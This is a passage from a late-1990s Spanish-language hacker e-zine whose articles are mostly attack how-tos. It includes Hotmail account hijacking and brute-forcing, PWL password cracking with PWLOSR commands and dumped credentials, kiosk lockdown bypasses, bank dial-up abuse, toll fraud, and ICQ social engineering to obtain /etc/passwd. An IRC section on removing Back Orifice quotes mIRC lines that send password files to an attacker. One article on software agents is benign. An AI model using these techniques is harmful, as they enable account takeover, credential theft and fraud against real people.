s t i f i c a c i o n ]───────────────────────────────────────────────── Bueno aqui estamos de nuevo, trayendo para ustedes algo de phreacking, en esta primera parte, de una serie de partes(o por lo menos eso espero), hablare sobre las bases de los celulares y de como aprovecharnos de ellos };-> Es algo corto, pero profundo.... han de disculparme pero esque estoy en epoca de examenes y no he tenido mucho tiempo libre.... ─[ L a s B a s e s ]───────────────────────────────────────────────────────── Cuando hablamos de telefonia celular, nos referimos a un sistema de comunicacion de alta tecnologia que facilita la transmision y recepcion de mensajes sin necesidad de cables y en lugar de estos utiliza ondas electromagneticas que viajan atravez del aire. El microfono del celular transforma la voz en un impulso electrico, y asi la voz puede viajar como una onda. Estas ondas golpean una pelicula del microfono la cual esta conectada por medio de unos minusculos cables hacia un iman. Al tener una corriente constante y ser movida por la pelicula delgada se producen variaciones en la corriente que son interpretadas como "la voz electrica". Esta "voz electrica" viaja del telefono celular al "Switch" o Centro de Telefonia Celular de una manera inalambrica. Esto es posible gracias a la tecnica de frecuencia modulada en donde la "voz electrica" se conecta con lo que se denomina "Sitio Celular" o "Estacion Base", que junto con otros sitios conforman las unidades de cobertura que por su forma hexagonal son llamadas "Celulas". Una vez que la voz es capturada por la "celula", es "demodulada" para obtener nuevamente una "voz electrica" y es mandada al "Switch", el cual se encarga de mandar la voz ya sea a otro telefono celular o a un telefono convencional. Ahora una forma mas practica de entender esto seria: Cuando marcas un numero a traves de tu celular, la señal es recibida por el "Switch" o Central de Telefonía Celular desde alguna Estacion Base. El "Switch" verifica que el numero de tu celular este autorizado para hacer llamadas, si no está autorizado, el "switch" envía un mensaje y da por terminado el proceso. Si esta autorizado, el "switch" analiza el numero al que estas llamando y decide si este pertenece a otro usuario de algun celular, o a un numero de la Red de Telefonía Pública Conmutada. Existen dos tipos de sistemas telefonicos, los analogicos y los digitales: ->El sistema Analogico o AMPS(Advanced Mobile Phone System) Hace referencia a la onda radial por la cual se transmite, es una señal fragil, transmitida a baja potencia. La llamada es convertida en impulsos electricos que viajan en forma de ondas de radio "Analogas" al sonido de la voz original. Estas ondas se distorsionan facilmente por factores naturales (lluvias), o por obstaculos (arboles, estructuras, lineas electronicas), que ocasionan perdida de la calidad y llamadas perdidas. Ademas este tipo de redes no puede ser ampliadas. ->El sistema Digital o DAMPS(Digital Advanced Mobile Phone System) Toma las señales analogas (sonidos), y las traduce a codigos binarios que pueden ser transmitidos a alta velocidad, para despues ser reconvertidos en el sonido de la voz original. La llamada se transmite de forma similar a los datos de computador, lo que permite que las transmisiones sean de alta capacidad, velocidad y resistencia a los inconvenientes usuales. Este sistema de redes permite subdividirse con el objeto de ampliarse. ─[ D e s p e d i d a ]─────────────────────────────────────────────────────────── Bueno pues por el momento eso es todo, se que es corto, pero esto solo son las bases del sistema celular, en el proximo numero entraremos de fondo en la clonada de celulares. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Guia para Hackear Hotmail - \Wend|g0 ]───────────────────────────────────── by SnEzE V.2.0 980123 2.44 PM Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >> Existen muchas maneras de hackear hotmail, pero solamente voy a escribir las mejores. Si estan no funcionan, por favor, mandame un email a christog@hem1.passagen.se y mirare si has hecho algo mal o si hotmail a cambiado algo. Recuerda que esta informacion es solamente para propositos educacionales y que nadie puede reprocharme el daño que puedas haber causado. Tambien recuerda que si alguien descubre que has estado paseando en su cuenta, se puede volver muy desagradable. Ok, vamos a ello... Estas son las formas que mas me gustan. ____ I_1_I - Brute force hacking a. Usa el telnet para conectar al puerto 110 (servidor de Hotmail). b. Escribe USER y el nombre de usuario de la victima. c. Escribe PASS y entonces adivina el password. d. Repetir hasta que se encuentre el password. !. Esto se denomina brute force hacking y requiere paciencia. Es mejor que intentar adivinarlos en la pagina principal de hotmail ya que es mas rapido ____ I_2_I - La mejor forma a. Pilla el username de la victima ( normalmente se halla en el adress-field ) b. Entonces escribe " www.hotmail.com/cgi-bin/start/victimsusername " c. Estas dentro! !. Este hack solamente funciona si tu estas en la misma red de trabajo o computadora de la victima y si el no ha desconectado del servidor (log out) ____ I_3_I - La manera "vieja" a. Ves a la pagina principal de Hotmail y pilla una cuenta (si todavia no tienes ninguna) b. Log Out c. Ahora escribe el username de la victima. d. Mira el source code. e. En la 5 fila deberias encontrar "action=someadress" d. Copia esta direccion y pasteala dentro de adress-field e. Estas dentro! !. Como puedes ver esto es un procedimiento muy largo y la victima tiene tiempo de sobra para desconectar (log out). ____ I_4_I - Otra... a. Ves a la pagina principal de Hotmail b. Copia el source code. c. Haz un nuevo archivo html con el mismo codigo pero cambia method=post y pon method=enter d. Haz un "view" de la pagina e. Cambia la direccion a www.hotmail.com/ (No apretes enter !!!) f. Haz que la victima escriba su username y password g. Mira en el adress-field. Alli podras ver ...&password:something... !. Esto es lo que yo uso, ya que te deja conocer el password. ( Si el sale del browser tu puedes ver el password en el History folder! He echo un ejemplo de este truko que puedes usar en: hem1.passagen.se/christog/index.htm. Buena suerte! LEELO! Los administradores de Hotmail han cambiado el sistema, asi que la victima puede desconectar (log out) incluso si tu estas dentro de su cuenta. De modo que no pierdas el tiempo! Este texto viene de http://hem1.passagen.se/christog/hotmail.htm Recuerda que es la version V.2.0.. Pronto habra mas... Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Crackear PWL's - CHack ]─────────────────────────────────────────────────── Como decodificar archivos PWL de Win95 (Solo para Newbies). Por CHack ... Una de tantas mañanas en las que leia la lista de Raregazz encontre un mensaje que hablaba de la "seguridad" en Windows 95 y de que se podia entrar en las maquinas usando algunos programas que decodifican los password de los usuarios que se encuentran en los archivos *.PWL Realmente no entendi mucho del tema pero el gusanillo de la curiosidad empezo a crecer; pero, ¿relamente que era eso de los PWL?, ¿donde estaban?, ¿que pitos tocaban? Lo primero fue encontrar esos programas en Internet, asi que buscando en varias paginas aparecieron el GLIDE y PWLOSR, relamente no supe como se manejaba el GLIDE pero vi que el PWLOSR no era tan dificil de manejar. La segunda estapa fue localizar donde estaban esos archivos PWL en mi disco duro y despues de eso tratar de destriparlo. El archivo PWL lo encontre en el subdirectorio: C:\WINDOWS El archivo tenia el nombre juan.pwl "casualmente" las letras de mi nombre de usuario juan. este archivo lo copie al subdirectorio donde tenia el PWLOSR y me propuse tratar de que el programa "adivinara" el pass, cosa no muy dificil por que eran solo tres letras 'AAA' para ello en una ventana de DOS utilice el siguiente comando: PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName] bueno realmente lo que escribi PWLOSR.EXE /BRUTEFORCE juan.pwl juan Con ello el programa desplego lo siguiente: (C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~ Beginning brute session for file 'JUAN.PWL', of user 'JUAN' with EnuStr: <<0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZÇéâäàåçêëèïîìÄÅÉæÆôöòûùÿÖÜ£¢¥₧ƒ≡>>. Using password lenght 0 characters. Using password lenght 1 characters. Using password lenght 2 characters. Using password lenght 3 characters. Password 'AAA' - maybe correct! Efectivamente el programa habia descubierto que mi pass era AAA Una vez localizado el pass me tuve que salir de la ventana de DOS y cerrarla desde W95, porque el programa continua buscando. Volvi a abrir la venta de DOS y le di la instruccion PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd] PWLOSR.EXE /LIST:E juan.pwl juan AAA Desplegando lo siguiente: (C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~ File: 'JUAN.PWL' has size 2B0h bytes for user 'JUAN' with password 'AAA' contains: -[Technical Information]--------------------------------------- Password file version: 968582E3; Offset to Header: 00000252 Unknown Align: 0000; UnkCount: 00000001; CheckSeed: 00000001 CryptoSeed Array = ( 00000000, 00000000, 00000000, 00000000 -[Resources pointers]------------------------------------------ 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 -[Resources key indexes]--------------------------------------- 00 FF FF FF FF FF FF FF - FF FF FF FF FF FF FF FF --------------------------------------------------------------- CryptoSign = 6C 3A 41 C3 F0 B1 0F A5 FB BD A8 A2 D8 E4 A1 C7 CheckoSign = 1F B4 4D E1 13 12 F0 CF 9D E3 AC 08 5B 44 58 57 --------------------------------------------------------------- Data = ( 0290, 0292, 0294, 0296, 0298, 029A, 029C, 029E, 02A0 Len. = ( 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000 -[Dump]-------------------------------------------------------- 0290: 02 83 8B F8 - 1E B1 8D 99 - EA F0 7A 97 - 33 9F 85 D5 02A0: AB F4 E9 92 - BF AE 5E E8 - 8F AC 90 E3 - A6 ED 14 C5 -[Character]--------------------------------------------------- --------------------------------------------------------------- -[Type]-[The resource location string]--------------[Password]- Link PLOPEZ\C pedro -??- 222.18.36.18/222.18.36.18 bxbxbxbx:tmibmr Dial *Rna\Data Internet\jmendez n33wr66& Link MARYSOL\C mary Link MEMO ROSAS\C memorin --------------------------------------------------------------- Key Entrys: 5; Number of resources: 5. O sorpresa, el PWLOSR no solo desplegaba mi pass, sino tambien los login y password de las maquinas a las que me habia conectado dentro de mi intranet, asi como mis conexiones de internet. Para este momento ya la curiosidad por entrar a mas maquinas me corroia, asi que con este metodo empece a entrar a otras que me dieron mas y mas informacion; solo me enfrente a tres problemas: 1.- El programa PWLOSR solo sirve para archivos PWL de W95. 2.- El nombre del archivo PWL no siempre coincidia con el nombre del usuario, situacion que corregi observando el archivo C:\Windows\System.ini que en una parte que dice: [Password Lists] JOSEANTONIOPEREZ=C:\JOSEANTO.PWL 3.- Los pass que utiliza la gente no son tan faciles como el mio que solo tenia tres letras, y la fuerza bruta tardaba mucho en encontrar pass de mas de 4 letras, por lo que tuve que utilizar un diccionario de apoyo que lo llame DICT.VOC y lo aplique utilizando para ello el siguiente comando. PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile] Bueno lo que de verdad escribi fue PWLOSR.EXE /VOCABULARY JOSEANTO.PWL JOSEANTONIOPEREZ DICT.VOC obteniendo el siguient resultado: (C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~ Beginning vocabulary session for file 'JOSEANTO.PWL', of user 'JOSEANTONIOPEREZ' via vocabulary 'DICT.VOC'. Password 'FRANK' - maybe correct! Password 'FRANK' - maybe correct! Totally trained 193762 passwords, Vocabulary position 2207350. Elapsed time 55 seconds; Average speed 3522 passwords per second. Cracked passwords 2. Check them under MD95 Logon. Se que para muchos el decodificar password es quiza su modo de vida, y que este articulo puede ser solo un grano de arena en el desierto, pero realmente espero que sirva para aquellos que empiezan en el oficio con mas ganas que conocimiento, y quiza estas cosa por ser tan faciles nadie se toma el tiempo para explicarlas. Gracias a Hard Wisdom autor de PWLOSR, Gracias a la lista que con cada respuesta incrementa mis pregunatas. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Agentes Inteligentes - 12r ]─────────────────────────────────────────────── --------------------------------------------------------------------- ---------------------Agentes Inteligentes---------------------------- ---------------------by 12r43l Overdrive----------------------------- ---------------------12r@antisocial.com------------------------------ --------------------------------------------------------------------- El objetivo de este articulo es explicar rapidamente que son los agentes inteligentes a si como sus pricipales aplicaciones. Imagina un dia, que lleges a tu PC y tus pendientes, ya esten clasificados, que las noticias que te interesan ya estan en tu escritorio, que las ofertas que tanto buscabas estan esperando tu compra. Todo esto sera posible gracias al "push-technology" el cual se basara en tus preferencias para filtrar todo tipo de informacion que no sea relevante para ti y la que te intereza sera llevada a tu escritorio; lista para que tu decidas que hacer con ella o en algunos casos ya este procesada. Este tipo de tecnologia se basa en piezas de software llamadas "Agentes Inteligentes", los cuales realizan toda la labor de recopilacion, clasificacion, filtrado o procesado de informacion an su ambiente de trabajo el cual puede ser desde una PC "standalone" hasta Internet. Como parte de los sistemas de informacion de siguiente generacion existiran objetos semi-autonomos de software que realizaran tareas especificas previamente establecidas. Todavia no existe una definicion universal de agentes inteligentes pero una definicion muy general podria ser la siguiente: "Una entidad de software autonoma que ejecuta tareal delegadas por el usuario" Los agentes inteligentes pueden interactuar con el usuario, con sistemas de informacion y con otros agentes. Pueden ser complejos o simples, trabajar solos o en grupos creando una sociedad cooperativa. Pueden viajar de un nodo a otro atravez de la red reportando sus actividades. La mayoria de los agentes, estan basados en la idea de que el usuario solo tiene que especificar algunas preferencias como por ejemplo 'que', 'cuando', 'donde' para que ellos puedan tomar deciciones basados en sus instrucciones. Existen algunas caracteristicas que puede tener un software que sea considerado un agente. 1.- Delegacion de actividades. Puede establecer algunos trabajos a otros agentes para lograr su trabajo final. 2.- Habilidad de comunicacion. Tiene que tener la habilidad de interactuar con el usuario asi como con otros agentes o medios. 3.- Monotireo. El agente debe de monitorear su entorno para poder realizar actividades autonomamente. 4.- Actuacion. Debe de poder afectar su ambiente de trabajo. 5.- Inteligencia. El agente debe de poder interpretar los eventos que le incumban para poder tener una actuacion apropiada asi como tomar deciciones. 6.- Continuacion. Necesita permanecer activo, corriendo procesos y actulizando su estado. 7.- Caracter. Algunos agentes pueden tener un estado emocional. 8.- Adaptabilidad. Deben optimizarse automaticamente basados en las preferencias de usuario aprendidas previamente. 9.- Mobilidad. Deben de tener la capacidad de transportarse a traves de redes y distintas plataformas y arquitecturas de informacion. Entre las pricipales aplicaciones de los Agentes Inteligentes tenemos las siguientes: Correo electronico, Sistemas de soporte de decision, Interfaz de usuario, Teleconferencia, Telecomunicaciones, Sistemas de calendarizacion, Entretenimiento, Web, Sistemas FAQ, Archivos de USENET, Editores graficos. Recusos : LALO (http://www.crim.ca/sbc/english/lalo) Agent Building Enviroment (http://raleigh.ibm.com/iag/iagsoft.htm) W-Prolog (http://munkora.cs.mu.oz.au/~winikoff/wp/) Tabriz Agent Ware (http://www.genmagic.com/Tabriz/) Phantom (http://apocalypse.org/pub/u/antony/phantom/phantom.html) Agent builder (http://www.cs.umbc.edu/news/raise.shtml) Java Intelligent Agent Library (http://www.bitpix.com/business/main/ialib/ialib.html) Tcl Plug-ins (http://www.sun.com/960710/feature1/plugin.html) Aglets Library (http://www.ibm.co.jp/trl/projects/aglets/) Jess (http://herzberg.ca.sandia.gov/jess/) Penguin (http://coriolan.amicus.com/penguin.html) HORB (http://wwww.mysticgrp.com/java/horb/welcome.html) Autonomus Agent Programming using Java (http://riz.siac.com/AIT/agentref.html) Java-To-Go- Interactive Computing Using Java. (http://ptolemy.eecs.berkeley.edu/~wli/group/java2go/java-to-go.html) Cyberagent SDK (http://www.ftp.com/cyberagents/) Oracle Web Agent (http://www.oracle.com/products/websystems/webserver/html/ois3.html) Phyton (http://www.phyton.org) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ Varios trucos interesantes - SatMex ]────────────────────────────────────── 1) Como joder los banners del anonymizer.com Estas cansado de los banners? Yo si y mucho pero te voy a decir como quitarlos sin pagar un centavo solo tienes que cambiar el puerto: http://invis.user.anonymizer.com/www.hostremoto.com.gob.mx.etc.etc Activalo en tu browser como proxy (donde dice puerto no escribas nada) y listo tienes proxy. La diferencia del anonymizer y otros ademas de que cobran por usarlo es que te permite entrar a cualquier direccion no importa que no acepte proxy (por lo menos en el hotmail me funciona). Si por alguna razon es cancelado te voy a decir como puedes saver la nueva direccion o el proxy; esto lo descubri escaneando los puertos del anonymizer. Es facil, solo con el un port scanner escanea www.anonymizer.com y los puertos que esten abiertos trata de ver su los puedes usar de proxy. Hay muchos puertos abiertos y la mayoria funcionan. 2) Como poder explorar las computadorasde telmex que estan de demostracion con internet directo. La otra vez que fui a pagar el telefono a telmex y descubri que habian puesto computadoras de muestra con internet para los clientes :) lo malo es que estaban protegida con algun programa que no te deja usar explorer, ms-dos, promt, desabilitadas muchas opciones (la verdad casi todas, run, shutdown, restar, restar msdos, etc, le busque y le busque pero con que estaban deshablilitadas muchas opciones pero usando el internet explorer (browser) en donde esta el link puedes poner c:\windows y puedes ver la informacion y ejecutarla.. (en el caso de mi pueblo asi estan deshabilitadas las opciones no se sin en otro lugar estan activadas) 3) Banco Bital La otra vez lei en un emag de raregazz pasado un numero carrier del banco bital. El numero era 91-800-50140 pues lo probe como una conexion ordinaria a internet y cuando te pide el username: password y le das cualquier username y password y marca que es incorrecto el login lo intentas de nuevo y en cuanto des enter despues de que escribas la password precionas la tecla F7 y te conecta a internet a una velocidad de 9600bps (te lo garantizo pero primero tienes que precionar breaks para que te aparezca el login). Pero no te creas que ya tienes conexion a internet. lo bueno es que te asigna ip adress pero unicamente solo puedes utilizar el ICQ y puedes escanear puertos, finger, whois, ping, trace. Tambien si se conectan 2 o mas personas con este mismo numero pueden compartir informacion por la razon que estan en el mismo servidor y pudes poner tu ftp server y que el otro usuario pueda entrar. Pero no puedes entrar a ningun chat no puedes usar telnet ni conectarte a una pagina web al menos que sea la pagina de www.bital.com.mx) Usa condon pa que no te cachen..... Proximamente tendre el numero de telefono (carrier) para que te conectes free a internet por medio de este servidor con estas claves..... 4) Hackeando desde el ICQ En estos dias el icq es el programa mas popular en el internet; si no sabes que es icq, es un programita que viene siendo un beeper y un celular mientras ese programita este activado estaras en linea con tus amigos. Pero no te voy a explicar muy bien mejor vete a www.mirabilis.com. Ahora que el icq esta de moda supongamos que nececitas una password de un servidor Ftp o alguien que quieras que te haga el favor de bajarte el /etc/shadow pues de la manera mas facil te vas a "add find users". Alli esta la opcion "icq main engine" escojela y donde dice email pones *@host.com.gob.mx.etc.etc y te saldran todos los usuarios de ese servidor y alli tu podras ver su info (all algunos muy l4m3rz que hasta ponen su telefono y su direccion y su nombre completo email, etc;) esto resulta mejor que el finger ;) de alli es una forma de tratar de acesar usando los apellidos o nombres de la persona pero otra forma que a mi me a resultado es contactando a esa persona y haciendome su amiga entonces le hago preguntas tu provedor acepta ftp? tu provedor te da tu password o tu la eliges? Si no sabe que es ftp solo dale el ftp pero en el browser dile que ponga esto porque se de muchos ignorantes que no saben ni madre: ftp://username:password@la_direccion_de_su_server.com/etc/passwd y dile que te pase el texto que salio ;) O tambien puedes usar mas ingenieria social solo es cuestion de pensar..... (te recomiendo que registres otra cuenta y te pongas nombre de mujer joven y atractiva para obtener mejores resultados y para que no te cachen.....) 5) Hacer Preacking desde cualquier lugar del mundo llamando a Usa *free* Te has fijado que los telefonos publicos de USA (Estados Unidos Americanos) puedes llamar a los telefonos publicos?. Haz una llamada por cobrar a un telefono publico y cuando contesten de el otro lado ese telefono sonara (claro que el publico) la operadora dire "acepta los cargos y ustedes contestan si. Si no lo has hecho hazlo =) Recuerda que tienes que buscar un telefono publico que permita recibir llamadas; de esos hay muchos en USA, no se si en otro lado habra; a mi siempre me funciona cuando hablo con mis hermanos.... Email Me: Sat@lanet.com.pe Sat@cotopaxi.dyn.ml.org |«╧╬(r) SatMex (r)╬╧»| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ IRC - ToMaCHeLi/ZeD ]────────────────────────────────────────────────────── MANERAS DE COLARSE (y prevenirse) EN UN HD ATRAVES DEL IRC ú POR ToMaCHeLi--(http://members.tripod.com/~tomacheli) Y ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html) MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg) ┌────────────┐ │INTRODUCCION│ └────────────┘ Debido al creciente aumento de maneras que existen de entrar y/o controlar computadoras ejenas a traves del irc, nos hemos decidido a escribir este articulo para raregazz. En el trataremos de explicar las formas que hay para introducirse, controlar.. un ordenador de forma remota a traves del irc. Si quieres comentarnos algo, aqui tienes nuestros mails: ToMaCHeLi----tomacheli@geocities.com ZeD----zed@mixmail.com ┌──────────────────────┐ │FIN DE LA INTRODUCCION│ └──────────────────────┘ BACK ORIFICE. -------------------------------------- El Back Orifice lo creo no hace demasiado tiempo un grupo de hackers americanos con el fin de poder entrar en cualquier ordenador sabiendo tan solo la IP del usuario. Si te mandan un .EXE NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO DE LO QUE ES. Muchas personas estan propagando por inet el programa SERVER de diversas maneras (lo mas extendido es por el IRC). Y aqui entra en papel el ignorante internauta que se dedica a ejecutarlo en su maquina creyendo que es un autoextractor de fotos X :). Una vez ejecutado SORPRESA!, el archivo desaparece ┐?┐?┐? otia ┐?┐?┐?, y la pobre victima piensa, (bah, me habra llegado defectuoso el archivo), y no le da importancia. Si, pues chaval FELICIDADES acabas de meter un troyano en tu sistema :), cualquiera que sepa tu IP podra hacer en tu PCera casi lo que le de la gana. Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao encima). El troyano en cuestion funciona de la siguiente manera: cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe y borra el ejecutable que te han pasado. Cada vez que reinicies tu windo2 (solo funciona en este sistema) el troyano se auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo (espacio).exe,por que no funcionara). El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION. este es un puerto llamado "31173" (sin comillas)(31173=elite) A traves de un programa que debe tener la persona que quiere acceder a tu computadora, este accedera directamente a tu c:\ a traves de unos comandos muy simples,pudiendo hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir mas puertos,ajecutar programas,incluso formatear el disco duro. Si notas que te esta pasando alguna de estas cosas lo que puedes hacer es lo siguiente: desconectate de internet y procede a borrar el troyano de la siguiente manera: Pa que lo pilles rapido, el archivo se mueve del directorio donde esta y va a parar al directorio :\windows\system convertido en (espacio).exe y ademas en el editor registros (REGEDIT), carpeta RunServices (puede ser que este en otra carpeta) se incorpora la siguiente linea en DATOS: "(espacio).exe", para que nada mas arrancar el ventanucos el troyano quede en memoria. Y diras bah, pos entonces borro el archivo (espacio).exe y yasta. Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja borrarlo. Y entonces??, a jodese jejeje. NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va). Pero eso te lo dire mas adelante, ahora sigue leyendo.... Como puedo saber si tengo el troyano en el sistema? --------------------------------------------------- La manera mas facil que hay es utilizar el programa CLIENT (cliente) apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el cliente de BO manda un PING, si no te responde nada, vale estas limpio y no tienes el troyano, pero si te pone algo como esto: ------- Packet received from 127.0.0.1 port 31337 ------- !PONG!1.20!DEFAULT! ------- End of data ------- Opssss, estas jodio, tan colao el troyano... ***************************************************************************** Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;) y sin ningun peligro al no estar conectado a inet. ***************************************************************************** Vale lo tengo y estoy muy asustao ┐como co±o me lo quito? --------------------------------------------------------- Puede que algunos ya lo hallais descubierto, para mi fue facil, la verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una manera de configurar este nombre y es posible que no siempre el troyano sea el (espacio).exe) Vale, como he dicho antes si intentas borrarlo, nanai, por que ya esta en memoria, asi que lo mas normal es pensar que puede haber una linea donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo CLAVES, VALORES y DATOS y íTACHAN! en una carpeta llamada RunServices (sigo diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del archivito íYA LO TENEMOS! solo queda eliminar la linea de DATOS para ello pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del editor de registros (Nota: es posible que en la busqueda aparezcan mas (espacio).exe pero solo debes borrar el de la carpeta RunServices o otras en las que pueda estar y sepas que es la que carga el troyano). Con todo esto hemos conseguido que la proxima vez que iniciemos el ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas a ejecutar o se te metera otra vez en el registro). Y por fin te has librado del troyano. Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria (si no todos)llevan alguna clase de virus dentro,osea que cambiaras este virus por otro,por lo que no habras logrado mucho :( SCRIPTS. ------------------- Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina de forma remota atraves del irc,ya que en algo que puede resultar tan inocente como una opcion para mandar un privado,puede esconder algun comando para que si el esta conectado automaticamente le mandes tu preciado archivo de contrase±as o lo que se le venga en gana en ese momento. Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas) te lo empolles y revises el codigo del script que usas abitualmente,no sea que resulte que cada vez que pides la lista de canales del servidor donde estes estes mandando un archivo a una persona que no quieres que lo tenga. Procura buscar comandos como los siguientes: /send c:\windows\*.pwl cualquier_nick_que_haya_puesto /fserve nick_que_haya_puesto 5 c: o cosas de este estilo que te puedan parecer sospechosas. Estos comandos pueden estar puestos de la siguiente manera Ejemplos: pidiendo la lista de canales: /list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo entrando a un canal: /join #$$?="Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c: recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado) on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick " $+ %file $+ " | /inc %fsendp | ignore -tacu5 $wildsite Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script, para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc VIRUS DE IRC. -------------------- Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera + ┐nunca se te ha ocurrido investigar estos famosos "virus"? pues a mi si,fijate :o) Si investigas un poco dentro del "script.ini" veras que lo que hace es lo siguiente: esta configurado para que cada vez que entres a un canal le mandes a todos los que estan dentro de ese canal el fichero "script.ini" ┐pero y si reconfiguramos el "script.ini" para que en vez de mandarselo a todo el canal solo le mande a una persona en concreto el famoso "pwl"? esto no es muy dificil de hacer si revisas el codigo del "script.ini" y cambias unos pocos parametros (hay que saber algo de scripting). En el caso del "dmsetup.exe" es algo mas peculiar. El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber programar en el lenguaje que esta echo para poder modificarlo a tu gusto. Detodas maneras el "virus" sin modificar ya es una jodienda de por si,lo que hace es lo siguiente: tiene la particularidad de ser "autoejecutable" osea que no hace falta que lo clikees tu para que este se instale en tu maquina :( Modifica algunas lineas del script.ini para que se autoenvie (igual que el "script.ini") Algunas de las versiones estudiadas actuan con mas particularidad e incluyen pautas para desconectar a un usuario si recibe la frase "tis to I who seem so sad" (sin comillas claro). Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje) Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que se reinicie la computadora y por si eso fuera poco encima cambia los directorios de los fserve por c:\mirc lo que puede ser una putada si guardas logs con contrase±as o algo asi en alguno de los subdiretorios de esta carpeta. Eliminar estos dos archivos es algo relativamente simple: para el script.ini: en la linea donde escribes normalmete en el mirc pon lo siguiente: "/unload -rs script.ini" (sin las comillas obviamente) lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves hacer cuando descarges de la memoria el archivo es lo siguiente: donde escribes normalente en el mirc escribe esto: "/removescript.ini" (sin las comillas) y ya estara borrado el "virus" Para el "dmsetup.exe" la cosa cambia un poco: Cierra todos los programas que tengas abiertos,localiza todos 